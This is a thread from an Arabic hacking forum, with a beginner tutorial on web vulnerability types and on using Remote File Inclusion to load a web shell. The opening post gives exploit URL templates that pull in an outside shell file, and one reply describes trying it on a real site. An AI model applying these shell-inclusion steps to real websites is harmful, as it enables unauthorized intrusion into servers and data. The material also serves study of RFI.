اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

شرح الثغرات + طريقة رفع الشيل في ثغرات Remote File include - حصريا

شرح الثغرات + طريقة رفع الشيل في ثغرات Remote File include - حصريا


صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 10 من 17

الموضوع: شرح الثغرات + طريقة رفع الشيل في ثغرات Remote File include - حصريا

  1. #1
    محظور Array
    تاريخ التسجيل
    Sep 2009
    المشاركات
    49

    افتراضي شرح الثغرات + طريقة رفع الشيل في ثغرات Remote File include - حصريا



    الثغرات :
    شرح تفصيلي للاخو المبتدئين
    نشالله الجميع بستفاد منه وانا متأكد رح يستفادوا بس بده شوية تدقيق وانتبه على كل خطوة اوك


    تابــــــــــــــــــــــ ــــــــــــــــــــــع




    (( الثغرات عبارة عن اخطاء يقع فيها مصمم البرنامج او سكربت معين ... ومن خلال هذه الاخطاء يجد الهكر
    منافذ لدخول الى المواقع .. والوصول الى السيرفر ))
    * البرامج يقصد بها السكربتات الموجوده فى مواقع معينه على سبيل المثال .. المنتدى عبارة عن سكربت ...
    او سكربت الصور .... او سكربت مكتبه البرامج
    Powered by vBulletin Version = يدل على سكربت المنتدى ... وهكذا


    انواع الثغرات : الثغرات تنقسم الى عنده انواع كثيرة ولكن سوف ناخذ بعض من هذه الثغرات وسوف نشرحها


    1 - ثغرات الفايل انكلود (( Remote file Inclusion Vulnerability ))
    يقصد بهذا النوع من الثغرات ... ان المصمم وقع فى خط برمجى وهذا الخطء يسمح لى رابط ملف خارجى بالموقع
    وطبعا الملف الخارجي يكون ( الشل = اداه اختراق )


    2 - ثغرات قواعد البيانات (( Remote SQL Injection Vulnerability )) ويقصد بها الثغرات التى تتح لنا
    معرفة معلومات لمجموعه معنية // علي سبيل المثال معرفه اسم الدخول وكلمة المرور لمدير الموقع


    3 - ثغرات الرفع (( Remote File Uploed )) ويقصد بها الثغرات التى تستطيع من خلالها رفع ملف على الموقع
    مثل ثغرات مراكز التحميل


    4 - ثغرات (( Cross-Site Scripting )) وهى XXS ويقصد بها الثغرات التى تستطيع من خلالها بسحب كوكيز اعضاء الموقع عبر كود معين ... مثال على ثغرات ( الثغرات الهوتميل )


    5 - ثغرات File Disclosure وهى الثغرات الى تستطيع من خلالها قرائة اى ملف على الموقع وهى تقريبا
    نفس ثغرات الفايل انكلود
    6 - ثغرات Command Execution وهى كذلك مشابه لثغرات الفايل انكلود ولكن الاختلاف انك تكتب اوامر لينكس
    على المتصفح بعد الاستغلال


    تقريباا هذه اشهر الثغرات المعروفه فى المواقع كما ان هناك ثغرات غير هذه مثل ثغرات Perl وثغرات البفر
    والزيور داي 0-day .... الخ


    * شرح التفصلي لثغرات ...
    1 - ثغرة الفايل انكلود ... طبعا نحن قلنا ان هذا النوع من الثغرات تسمح لى رابط ملف خارجى بالموقع بو اسطة متغير
    معين وطبعا الملف الخارجي يكون ( الشل = اداه اختراق )


    على سبيل المثال ... عندى موقع www.XXXXXX.com/vb/ مصاب بثغرة فايل فى سكربت المنتدى الى هو VB
    والخط على صفحة faq.php والمتغير الى يسمح لى بربط الشل هو shoot3r
    فان الثغرة والاستغلال يكون بهذا الشكل ...
    /ww.XXXXXX.com/vb/faq.php?shoot3r=youshell.txt?cmd



    تذكر ان ثغرات الانكلود تتكون من ( السكربت المصاب / مكان المجلد / الصفحة التى يوجد بها المتغير الى يسمح بربط الشل )


    http://www.xxxx.com/Folder/pag.php?i...=youshell.txt?
    الموقع = www.xxx.com
    مجلد السكربت = Folder
    الصفحة التى فيها المتغير الى يسمح لنا بجلب ملف خارجى = pag.php
    المتغير الى نربط به الملف الخارجى ( الشل ) incloud
    علامة =
    الشل بصغية تكتس = youshell.txt
    وعلامة ؟


    وكذا نحن الان عرفنا كيفية التعامل مع الثغرات الفايل انكلود .. ولكن انا اعتقد انه الحين فى سؤال يدور فى ذهن المبدئين



    وهو .. كيف اعرف ثغرات الانكلود ... او كيف اعرف الاستغلال لثغرة ...

    راح نقولك يا اخى العزيز .. انه فى مواقع سيكورتى خاصة تعرض لك اخر الثغرات المكتشفة بالاضافة الى طريقة الاستغلال



    من هذه المواقع http://milw0rm.org وكذلك http://securityfocus.com



    طيب ناخذ مثال من المواقع السيكورتى ... http://milw0rm.org/***apps.php ونبحث عن الثغرات الفايل الانكلود



  2. #2
    هكر مبتديء Array الصورة الرمزية Hacker Tabuk
    تاريخ التسجيل
    Jul 2010
    المشاركات
    46

    افتراضي رد: ((شرح الثغرات + طريقة رفع الشيل في ثغرات Remote File ))- حصريا + احترف يا مبتدئ

    جااااااااااااااااااري


  3. #3
    هكر مبتديء Array الصورة الرمزية Hacker Tabuk
    تاريخ التسجيل
    Jul 2010
    المشاركات
    46

    افتراضي رد: ((شرح الثغرات + طريقة رفع الشيل في ثغرات Remote File ))- حصريا + احترف يا مبتدئ

    مشكوووووووور وربي مني فاهم شيء ككككككككك



  4. #4
    هكر مبتديء Array الصورة الرمزية Mays
    تاريخ التسجيل
    Jan 2010
    المشاركات
    62

    افتراضي رد: ((شرح الثغرات + طريقة رفع الشيل في ثغرات Remote File ))- حصريا + احترف يا مبتدئ

    صرأحة ما فهمت ولو في شرح بالصور يكون أفضل بلييييييييييييييييييييييي ييييزز

    مشان نطبق أهئ أهئ

    بليييييز



    نبي درس بآخر الثغرات وبالصور من الالف الى الياء


  5. #5
    هكر مبتديء Array
    تاريخ التسجيل
    Jan 2011
    المشاركات
    4

    افتراضي رد: شرح الثغرات + طريقة رفع الشيل في ثغرات Remote File include - حصريا

    thanx man !!!


  6. #6
    هكر مبتديء Array
    تاريخ التسجيل
    Jan 2011
    المشاركات
    8

    افتراضي رد: شرح الثغرات + طريقة رفع الشيل في ثغرات Remote File include - حصريا

    th'x brother for inFo ^^



  7. #7
    محظور Array
    تاريخ التسجيل
    Dec 2010
    الدولة
    نهاية العالم
    المشاركات
    242

    افتراضي رد: شرح الثغرات + طريقة رفع الشيل في ثغرات Remote File include - حصريا

    مشكوررررررررررررررررررررر ررررررررررررر


  8. #8
    هكر مبتديء Array الصورة الرمزية Qaher011
    تاريخ التسجيل
    Nov 2010
    المشاركات
    28

    افتراضي رد: شرح الثغرات + طريقة رفع الشيل في ثغرات Remote File include - حصريا

    شرح أكثر من رائع أخـــــــــوي العزيز
    بــــــــــــاركـــــــ اللـــــــــــهـ فـــــيـــــكـــ


  9. #9
    هكر مبتديء Array
    تاريخ التسجيل
    Dec 2010
    المشاركات
    13

    افتراضي رد: شرح الثغرات + طريقة رفع الشيل في ثغرات Remote File include - حصريا

    اصراحه اصراحه انا جاني مرض اتحميل انا ما اعرف احمل ابي احد يعلمتي كيف احمل هذا ايميلي [email protected] بلـــــــــــــــــــــــ ـــيز



  10. #10
    هكر مبتديء Array
    تاريخ التسجيل
    Feb 2011
    المشاركات
    2

    افتراضي رد: شرح الثغرات + طريقة رفع الشيل في ثغرات Remote File include - حصريا

    والله اني خفت لما نسخت الرابط ووضعت بدل النجوم موقع إخر
    بصراحة حسيت إني ...
    المهم جاتني ذي الصورة
    وعلى طووول
    صكيت المووقع

    وطبعاً
    ذي أول مشاركة لي
    تقبل مروري..


صفحة 1 من 2 12 الأخيرةالأخيرة

المواضيع المتشابهه

  1. مشاركات: 41
    آخر مشاركة: 07-19-2012, 12:14 PM
  2. مشاركات: 16
    آخر مشاركة: 05-11-2012, 06:27 PM
  3. شرح استغلال ثغرات remote file include
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 89
    آخر مشاركة: 05-11-2012, 05:32 PM
  4. رفع الشيل عبر ثغرات remote file include
    بواسطة ASDELY-ScOrPiOn في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 45
    آخر مشاركة: 03-16-2012, 10:13 PM

وجد الزوار هذه الصفحة بالبحث عن:

ثغرة include

طرق رفع الشل

ثغرات Remote File Include

شرح ثغرة remote file include

ثغرة رفع الشل

شرح ثغرة رفع الشل

كيفية رفع الشل

استغلال ثغرة الفايل انكلود

ثغرة انكلود

ثغرة ريموت فايل انكلودافضل طرق رفع الشلremote file include شرحاستغلال ثغرة فايل انكلودكيفية رفع الشيل عبر ثغرات file includeمنتدى اختراق مواقع وسيرفرات ثغرة remote file includeدورة اختراق بثغرة Remote File Includeشرح ثغرة فايل انكلودسكربتات مواقع ريموت فايل انكلوداستغلال ثغرة file include للمبتدئينالاختراق فايل انكلود الشيلثغرة الانكلودشرح ثغرات الفايل انكلودرفع الشل ريموتثغره رفع الشل شرح جميع الثغرات

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •